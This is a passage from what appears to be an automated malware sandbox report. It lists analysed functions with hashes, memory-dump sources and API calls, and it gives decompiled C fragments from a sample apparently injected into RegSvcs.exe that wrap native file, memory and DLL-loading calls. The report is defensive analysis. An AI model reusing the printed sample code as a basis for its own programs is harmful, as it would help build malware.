Instruction Fuzzy Hash: ED1126B6D042088FCB10CF9AC844BDEFBF8EB49320F05841AE519B7240C774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0310DDD8, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0310DE3D

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8b7cebc83a3788da89c47c28a91938ded84a284bd68a92119693834354ceb9cd
Instruction ID: 1e5e613780ffe53e478d646c3f5546247081f9b32c98549e7fc009701ad75a9e
Opcode Fuzzy Hash: 8b7cebc83a3788da89c47c28a91938ded84a284bd68a92119693834354ceb9cd
Instruction Fuzzy Hash: D51125B18003088FCB10CF89D588BDEBBF8FB48320F10841AD515A7240C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0310BCC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0310BD2E

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 53c402b4f0c837821a519bb789c60911026632c25616d5918767f7380138a884
Instruction ID: fb603cd30e689bdeea96648d97cd05e4c8a4e2b5755ac24ff1eaff218e0e9fa7
Opcode Fuzzy Hash: 53c402b4f0c837821a519bb789c60911026632c25616d5918767f7380138a884
Instruction Fuzzy Hash: 4B110FB2C002498FCB10CF9AC944BDEFBF4AB88224F15841AD429A7240C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0310DDE0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0310DE3D

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1bdb4c176f6802f57e2896be362881f6c9d16055f08ca5d2a907bb56940b78f2
Instruction ID: e8317d057a1ba4ee0f37fbc03a3c4295fb859993080f87e2c267513f44a694cf
Opcode Fuzzy Hash: 1bdb4c176f6802f57e2896be362881f6c9d16055f08ca5d2a907bb56940b78f2
Instruction Fuzzy Hash: 0211D0B59002499FDB10DF99D988BEEBBF8EB48324F14841AD919A7240D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0180D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337506732.000000000180D000.00000040.00000001.sdmp, Offset: 0180D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747e656d99bae1124b1df6941d8cde4b9450cfb822fa413185d8e3f79568cbb6
Instruction ID: 02807a08215cc6798b94ccee105197dc44f980866dd66668f062595b8c19bb34
Opcode Fuzzy Hash: 747e656d99bae1124b1df6941d8cde4b9450cfb822fa413185d8e3f79568cbb6
Instruction Fuzzy Hash: 1D210671504248DFDB42CFD4DDC0B26BB65FB88328F248669ED058B296C337D956C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0181D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337529885.000000000181D000.00000040.00000001.sdmp, Offset: 0181D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43b81ba4dbe7b48bc2492aeda1748a10b439b141d4aaa5eecc3da8c403cc836
Instruction ID: d6988078ac69e63c7cec286fdb20b7a22af0fc852fa89a80b0a0df13c3d1eccc
Opcode Fuzzy Hash: d43b81ba4dbe7b48bc2492aeda1748a10b439b141d4aaa5eecc3da8c403cc836
Instruction Fuzzy Hash: BA213776504244DFCB15CF64D9C8B16BB69FB88358F24CA6DD8098B34AC33BD947CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0180D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337506732.000000000180D000.00000040.00000001.sdmp, Offset: 0180D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction ID: 1ab60afda346f110c6c244615b238c3f2348f0bb2fe87f9d3ed73f4f70b4c113
Opcode Fuzzy Hash: 82c2d4f6a2d17f220f738be8533c1ca489a9cfe0fbf4c45656e9e51e69fbbc3b
Instruction Fuzzy Hash: 8A110672404284CFCB02CF54D9C0B16BF71FB84324F24C2A9EC054B256C336D556CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0181D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337529885.000000000181D000.00000040.00000001.sdmp, Offset: 0181D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634690fb963a58e4e786e327c84160adc3c6b9f5f52cf29ba2d57553d863054
Instruction ID: ee2a8424326c5fc98f95f885a6db394d5e8d2dad7a2451e420cd2d74dd5e318d
Opcode Fuzzy Hash: 1634690fb963a58e4e786e327c84160adc3c6b9f5f52cf29ba2d57553d863054
Instruction Fuzzy Hash: 0E11BE76504280CFCB12CF54D5C4B15BB61FB44314F28C6A9D8098B65AC33AD54ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0180D7FD, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337506732.000000000180D000.00000040.00000001.sdmp, Offset: 0180D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 884c0316108319c3968a09602297efc1d43806bfd31f550a0ec42408989eb7a0
Instruction ID: 695951458d6b1e858d258f121fa63a403a43bf65f7a99f1aafc235af294db515
Opcode Fuzzy Hash: 884c0316108319c3968a09602297efc1d43806bfd31f550a0ec42408989eb7a0
Instruction Fuzzy Hash: B401F7714083489AE7524AD9CC84766BB9CEF41338F08C95AEE089B2C3D3749B44C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0180D7FC, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337506732.000000000180D000.00000040.00000001.sdmp, Offset: 0180D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 111a6cf9bf4be3c574e5993a6bb084216b51ebe5483627dccad9799659e137ee
Instruction ID: 33ecec0d65c033b3f7d77c832ffd853ccf5050ca83fea18c369aae90fed5c1f1
Opcode Fuzzy Hash: 111a6cf9bf4be3c574e5993a6bb084216b51ebe5483627dccad9799659e137ee
Instruction Fuzzy Hash: 77F0F671404388AEE7218A4ACCC4BA2FFACEB41734F18C55AED185B287C3799944CAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E56501, Relevance: 2.7, Instructions: 2704COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.336490398.0000000000E52000.00000002.00020000.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000000.00000002.336458533.0000000000E50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a017058692b92870a3cc97c8372537bc921fabfbd18515f3b94ab771ccc49a70
Instruction ID: 77572526e129b561219f2f2d809866ebe9e560551efd3bff34c042801c3d143c
Opcode Fuzzy Hash: a017058692b92870a3cc97c8372537bc921fabfbd18515f3b94ab771ccc49a70
Instruction Fuzzy Hash: D323662104EBC25FD7139BB45E711E2BFB1AD5321431E49CBC8C08F5A3E1195AAAE772

Uniqueness

Uniqueness Score: -1.00%

Function 057D8318, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

, xrefs: 057D842E

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 723c4d04bf62262a605f7e524d5cb62815d1128741e5df80a3043c65b636b0fd
Instruction ID: 575785f8f6f8c1107a99d0d4591cff63259a9ddb4111f5e8aa1a1b9f5586efc5
Opcode Fuzzy Hash: 723c4d04bf62262a605f7e524d5cb62815d1128741e5df80a3043c65b636b0fd
Instruction Fuzzy Hash: 5351D071B001058FCB14DFA9D885ABEBBF2FB88211B648575D609C7749DB30EC418BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E55998, Relevance: .7, Instructions: 734COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.336490398.0000000000E52000.00000002.00020000.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000000.00000002.336458533.0000000000E50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d102f090ebaf20a6cfb887023123b698dc4ccc264dda8accfd9b6694cb6219
Instruction ID: 0bd9d732c07a836a6d968c45f0ce826b3fa46a04615315e9430fb23a98dbc321
Opcode Fuzzy Hash: c9d102f090ebaf20a6cfb887023123b698dc4ccc264dda8accfd9b6694cb6219
Instruction Fuzzy Hash: A042681204EBC25FDB139BB46E311D5BFB1AD5321435E58CBC4C08F9A3E5051AAAE772

Uniqueness

Uniqueness Score: -1.00%

Function 00E559CA, Relevance: .7, Instructions: 722COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.336490398.0000000000E52000.00000002.00020000.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000000.00000002.336458533.0000000000E50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdf6181d025b63403d6ac41386775f8bb5b1c6c182659f7939a9fecf1fef8f2
Instruction ID: 71c81511461654d99290b2fcf67ff3dff12b9766bbf101caa337ed5daee97860
Opcode Fuzzy Hash: fcdf6181d025b63403d6ac41386775f8bb5b1c6c182659f7939a9fecf1fef8f2
Instruction Fuzzy Hash: CD42681204EBC25FDB139BB46E311D5BFB1AD4321436E58CBC4C08F9A3E5051AAEE766

Uniqueness

Uniqueness Score: -1.00%

Function 03109890, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5eb23a26858e58079a7ca8edc090d55b4125af7b14d46046154bf80ec1c2f08
Instruction ID: 3ea8c5c5d481ae9a49a08278ea025da783ee8a749d173242dcfaa80944c74a45
Opcode Fuzzy Hash: b5eb23a26858e58079a7ca8edc090d55b4125af7b14d46046154bf80ec1c2f08
Instruction Fuzzy Hash: C7A17B36E0071A8FCF05DFB5D84459EBBB2FF89300B15816AE905BB261EBB1E955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0310C428, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6583cd66eceba9c733970db6174fafbf0ecf7374ed85b42bf1482384fc23ec7
Instruction ID: dec40b3cad27e750db6f8634fa023762fd4e0e07592c2ec7e46c41399308fe56
Opcode Fuzzy Hash: d6583cd66eceba9c733970db6174fafbf0ecf7374ed85b42bf1482384fc23ec7
Instruction Fuzzy Hash: D2C129B19117468BD710EF65F88C1897BB1FB86328F70C308D2696B6D8D7B8154AEF84

Uniqueness

Uniqueness Score: -1.00%

Function 057D8091, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa222226766033ca0a8c6416899e70bb26346ce9504126d51bf1597ec1e1c222
Instruction ID: 58708cb8f8d69a34515680621c26f7dbefe28065496dc28beb3b4d8901725411
Opcode Fuzzy Hash: aa222226766033ca0a8c6416899e70bb26346ce9504126d51bf1597ec1e1c222
Instruction Fuzzy Hash: E7612932F105259FD714DB69CC80AAEB3B3AFC8614F2A8168E4099B765DB35EC01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E55871, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.336490398.0000000000E52000.00000002.00020000.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000000.00000002.336458533.0000000000E50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55a5e4b0a5321eaab50086d86b56cb3f6ffd358606509825a065b608421d081
Instruction ID: 3dd471f53699e1f846686ad9f3836a0ef3d9de688a207d83a2cb6632c8ef64cd
Opcode Fuzzy Hash: f55a5e4b0a5321eaab50086d86b56cb3f6ffd358606509825a065b608421d081
Instruction Fuzzy Hash: B351975108EFC2AFE31347746A329D6BFF92D8725435D08C3D8C14BAA3D1181A78EB66

Uniqueness

Uniqueness Score: -1.00%

Function 0310FD5F, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8981fe8c23a2b2a52a3aec92832bb99d5309bd99d189808b3d619454bb83d767
Instruction ID: 37a3d7cfdd25764b8deda41ab2d5dd444770cf1fcd132beaedfd50106489e635
Opcode Fuzzy Hash: 8981fe8c23a2b2a52a3aec92832bb99d5309bd99d189808b3d619454bb83d767
Instruction Fuzzy Hash: F441E874E0520A9BCB18CFA9C5815EEFBF2FF89200F25C46AD515A7254D7749A82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0310FD70, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f43e7874a10dab176d26d34f6199ac87d8d1576a507dea86b82c694c26783b2
Instruction ID: 6354dda2d92078adb2e2c16140735de76e0bc804acaca5d036a99303d09dbb46
Opcode Fuzzy Hash: 2f43e7874a10dab176d26d34f6199ac87d8d1576a507dea86b82c694c26783b2
Instruction Fuzzy Hash: C841E5B4E0520E8BCB18CFA9C5815EEFBF2FF8D200F24846AC415A7254D7749A828B90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 6572 Parent PID: 6396 RegSvcs.exeCOMMON

Executed Functions

Function 0041825A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041825A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;

				asm("rcl dword [ebp+0x43], 0x55");
				_t16 = _a4;
				_t33 = _a4 + 0xc48;
				E00418DB0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a, _t32);
				_t7 =  &_a32; // 0x413d42
				_t13 =  &_a8; // 0x413d42
				_t21 =  *((intOrPtr*)( *_t33))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, __eax); // executed
				return _t21;
			}

0x0041825d
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
U, xrefs: 0041825D
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A$U
API String ID: 2738559852-3441936401
Opcode ID: 02bc6c7ce3185c57ca19c828bf96afc869a337e23a4470b4b9f4fe9f66ab1205
Instruction ID: a9df54c0090caf713ce57480e42c15d7885068ec9d67cdd9b4c200865c0ce589
Opcode Fuzzy Hash: 02bc6c7ce3185c57ca19c828bf96afc869a337e23a4470b4b9f4fe9f66ab1205
Instruction Fuzzy Hash: 98F0E7B2204208AFCB14DF89DC80DEB77A9AF8C754F058248FA1D97241CA30E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b19
0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004181AA(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t34;
				void* _t35;

				asm("daa");
				asm("invalid");
				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28, _t35);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x004181ab
0x004181ac
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d17b3a825e1862ab8bb0be99efb39d9dcf0058e16aa1b46fb29ce06155e117f4
Instruction ID: f20727104808ff71914d4c97c303387f4df6ab94bb314ebc93b8b493f19b9078
Opcode Fuzzy Hash: d17b3a825e1862ab8bb0be99efb39d9dcf0058e16aa1b46fb29ce06155e117f4
Instruction Fuzzy Hash: DB01A4B6200208ABCB48CF89DC85EEB77A9AF8C754F158248FA1DD7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004182DA(char __eax, char _a1, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t13;
				void* _t14;

				asm("out dx, eax");
				 *0xec8b55cd = __eax;
				_push( &_a1);
				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409733
				E00418DB0(_t13, _a4, _t3,  *_t2, 0, 0x2c, _t14);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x004182da
0x004182de
0x004182e0
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a73f40165db29429b2901a8437b065f8c0236b9019309d38798ed231854e65ec
Instruction ID: 9e2cf5ab784f6e2774cbd1a420ae87b0d3434f0ada1e1ca5d316ae635468f30d
Opcode Fuzzy Hash: a73f40165db29429b2901a8437b065f8c0236b9019309d38798ed231854e65ec
Instruction Fuzzy Hash: 3CE08676640254AFD710EF95CC44EE77B69EB55354F154059F6589B242C930A600C794

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 00FE98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE98FA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
Instruction ID: 1f66aa348b942f1543d33f74b6675086b27df1da0c3e8cc2a9ac19bafc2c9233
Opcode Fuzzy Hash: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
Instruction Fuzzy Hash: AE90026160100902D20171594404626100B9BD0381F92C032A2015556FCA658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE986A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
Instruction ID: e13c9f4c3f3591679f70e1bc5d393f13bc1487c8d840833ea98833aea70d8273
Opcode Fuzzy Hash: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
Instruction Fuzzy Hash: 5E90027120100813D21161594504717100A9BD0381F92C422A1415559E96968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE984A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
Instruction ID: d5dad89dd970f4b1df63fd1e16f416388f30dba2f7063050d8a1dc5e85f7957c
Opcode Fuzzy Hash: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
Instruction Fuzzy Hash: 6E900261242045525645B15944045175007ABE0381792C022A2405951D85669856F661

Uniqueness

Uniqueness Score: -1.00%

Function 00FE99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE99AA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
Instruction ID: 407a2508857720803f5503cf4f29efa6ac1a96e484fee0b330fbbf414f3a82cb
Opcode Fuzzy Hash: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
Instruction Fuzzy Hash: 939002A134100842D20061594414B161006DBE1341F52C025E2055555E8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE991A

Memory Dump Source

